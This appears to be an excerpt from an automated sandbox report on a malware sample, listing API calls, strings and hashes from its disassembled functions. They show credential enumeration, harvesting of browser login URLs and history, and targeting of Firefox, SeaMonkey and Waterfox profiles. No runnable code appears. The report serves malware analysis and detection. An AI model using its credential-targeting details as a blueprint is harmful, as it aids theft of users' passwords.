                                                              • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                              • API String ID: 2804212203-2982631422
                                                              • Opcode ID: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                              • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                              • Opcode Fuzzy Hash: b10a6b133fecd4ba1fe00162e0f0d1ba32908353d1defd03a55daed51eef6c1a
                                                              • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                              • memset.MSVCRT ref: 0040BC75
                                                              • memset.MSVCRT ref: 0040BC8C
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                              • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                              • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                              • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                              • String ID:
                                                              • API String ID: 115830560-3916222277
                                                              • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                              • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                              • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                              • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                              Control-flow Graph

                                                              APIs
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                              • _wcslwr.MSVCRT ref: 0040C817
                                                                • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                              • wcslen.MSVCRT ref: 0040C82C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                              • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                              • API String ID: 2936932814-4196376884
                                                              • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                              • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                              • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                              • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 886 40bdb0-40bdce call 404363 889 40bf63-40bf6f call 40440c 886->889 890 40bdd4-40bddd 886->890 892 40bdee 890->892 893 40bddf-40bdec CredEnumerateW 890->893 894 40bdf0-40bdf2 892->894 893->894 894->889 896 40bdf8-40be18 call 40b2cc wcslen 894->896 899 40bf5d 896->899 900 40be1e-40be20 896->900 899->889 900->899 901 40be26-40be42 wcsncmp 900->901 902 40be48-40be77 call 40bd5d call 404423 901->902 903 40bf4e-40bf57 901->903 902->903 908 40be7d-40bea3 memset 902->908 903->899 903->900 909 40bea5 908->909 910 40bea7-40beea memcpy 908->910 909->910 911 40bf11-40bf2d wcschr 910->911 912 40beec-40bf06 call 40b2cc _wcsnicmp 910->912 914 40bf38-40bf48 LocalFree 911->914 915 40bf2f-40bf35 911->915 912->911 917 40bf08-40bf0e 912->917 914->903 915->914 917->911
                                                              APIs
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                              • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                              • wcslen.MSVCRT ref: 0040BE06
                                                              • wcsncmp.MSVCRT ref: 0040BE38
                                                              • memset.MSVCRT ref: 0040BE91
                                                              • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                              • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                              • wcschr.MSVCRT ref: 0040BF24
                                                              • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                              • String ID:
                                                              • API String ID: 697348961-0
                                                              • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                              • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                              • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                              • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                              APIs
                                                              • memset.MSVCRT ref: 00403CBF
                                                              • memset.MSVCRT ref: 00403CD4
                                                              • memset.MSVCRT ref: 00403CE9
                                                              • memset.MSVCRT ref: 00403CFE
                                                              • memset.MSVCRT ref: 00403D13
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403DDA
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                              • String ID: Waterfox$Waterfox\Profiles
                                                              • API String ID: 1829478387-11920434
                                                              • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                              • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                              • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                              • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                              APIs
                                                              • memset.MSVCRT ref: 00403E50
                                                              • memset.MSVCRT ref: 00403E65
                                                              • memset.MSVCRT ref: 00403E7A
                                                              • memset.MSVCRT ref: 00403E8F
                                                              • memset.MSVCRT ref: 00403EA4
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 00403F6B
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                              • API String ID: 1829478387-2068335096
                                                              • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                              • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                              • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                              • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                              APIs
                                                              • memset.MSVCRT ref: 00403FE1
                                                              • memset.MSVCRT ref: 00403FF6
                                                              • memset.MSVCRT ref: 0040400B
                                                              • memset.MSVCRT ref: 00404020
                                                              • memset.MSVCRT ref: 00404035
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                              • memset.MSVCRT ref: 004040FC
                                                                • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                              • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                              • API String ID: 1829478387-3369679110
                                                              • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                              • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                              • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                              • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                              APIs
                                                              • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                              • API String ID: 3510742995-2641926074
                                                              • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                              • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                              • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                              • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
                                                              APIs
                                                              • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                              • GetLastError.KERNEL32 ref: 0041847E
                                                              • free.MSVCRT ref: 0041848B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: CreateErrorFileLastfree
                                                              • String ID: |A
                                                              • API String ID: 981974120-1717621600
                                                              • Opcode ID: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                              • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                              • Opcode Fuzzy Hash: b73738cfafb11dafaf653c45b8d30767a4f0487cb759c2014a2d8a4f30590433
                                                              • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                              APIs
                                                                • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                • Part of subcall function 0044553B: memset.MSVCRT ref: 004455C2
                                                                • Part of subcall function 0044553B: wcsrchr.MSVCRT ref: 004455DA
                                                              • memset.MSVCRT ref: 004033B7
                                                              • memcpy.MSVCRT(?,00000000,0000121C), ref: 004033D0
                                                              • wcscmp.MSVCRT ref: 004033FC
                                                              • _wcsicmp.MSVCRT ref: 00403439
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$_wcsicmpfreememcpywcscmpwcsrchr
                                                              • String ID: $0.@
                                                              • API String ID: 2758756878-1896041820
                                                              • Opcode ID: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                              • Instruction ID: ab192eb15c9642abc1a13bae453f9d52c7669558764b377fc560e22e349fc473
                                                              • Opcode Fuzzy Hash: f66ff37cfebf4588bd42dffc34473b3fc2588101413319c72ad25ea5b69c0f44
                                                              • Instruction Fuzzy Hash: 6B414A71A0C3819BD770EF65C885A8BB7E8AF86314F004D2FE48C97681DB3899458B5B
                                                              APIs
                                                                • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2941347001-0
                                                              • Opcode ID: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                              • Instruction ID: 45112ec7679d7541be2eaee67b01953ccf91f0241e5cd71b41190719d78dca83
                                                              • Opcode Fuzzy Hash: 887775328fc4d7656a99cf0210b1f43b8bf028f74b4fef276dc7ab680041333b
                                                              • Instruction Fuzzy Hash: 2E115871840700EDEA207F72DD0FF2B7AA5EF40B14F10882EF555594E1EBB6A8119E9C
                                                              APIs
                                                              • memset.MSVCRT ref: 00403C09
                                                              • memset.MSVCRT ref: 00403C1E
                                                                • Part of subcall function 00409719: wcslen.MSVCRT ref: 0040971A
                                                                • Part of subcall function 00409719: wcscat.MSVCRT ref: 00409732
                                                              • wcscat.MSVCRT ref: 00403C47
                                                                • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                              • wcscat.MSVCRT ref: 00403C70
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memsetwcscat$wcscpywcslen
                                                              • String ID: Mozilla\Firefox\Profiles$Mozilla\Profiles
                                                              • API String ID: 2489821370-1174173950
                                                              • Opcode ID: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                              • Instruction ID: 5219a381a5be6f9fff484f4b9c8ff18b49dc44b18064e24db21ac924a7a96902
                                                              • Opcode Fuzzy Hash: 5af024c53119846c6cf23d5d39710aba0b9f01952ad673d04fbaa3fd9d46c714
                                                              • Instruction Fuzzy Hash: 4401A9B294032C76DB207B669C86ECF672C9F45358F01447FB504B7182D9785E844AA9
                                                              APIs
                                                              • memset.MSVCRT ref: 0040A824
                                                              • GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                              • wcscpy.MSVCRT ref: 0040A854
                                                              • wcscat.MSVCRT ref: 0040A86A
                                                              • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                              • LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 669240632-0
                                                              • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                              • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                              • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                              • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                              APIs
                                                              • wcschr.MSVCRT ref: 00414458
                                                              • _snwprintf.MSVCRT ref: 0041447D
                                                              • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                              • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                              • String ID: "%s"
                                                              • API String ID: 1343145685-3297466227
                                                              • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                              • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                              • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                              • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                              • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                              • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: AddressHandleModuleProcProcessTimes
                                                              • String ID: GetProcessTimes$kernel32.dll
                                                              • API String ID: 1714573020-3385500049
                                                              • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                              • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                              • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                              • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                              APIs
                                                              • memset.MSVCRT ref: 004087D6
                                                                • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                              • memset.MSVCRT ref: 00408828
                                                              • memset.MSVCRT ref: 00408840
                                                              • memset.MSVCRT ref: 00408858
                                                              • memset.MSVCRT ref: 00408870
                                                              • memset.MSVCRT ref: 00408888
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                              • String ID:
                                                              • API String ID: 2911713577-0
                                                              • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                              • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                              • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                              • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                              APIs
                                                              • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                              • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                              • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 0000000E.00000002.2357723593.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_14_2_400000_msiexec.jbxd
                                                              Similarity
                                                              • API ID: memcmp
                                                              • String ID: @ $SQLite format 3
                                                              • API String ID: 1475443563-3708268960
                                                              • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                              • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                              • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                              • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
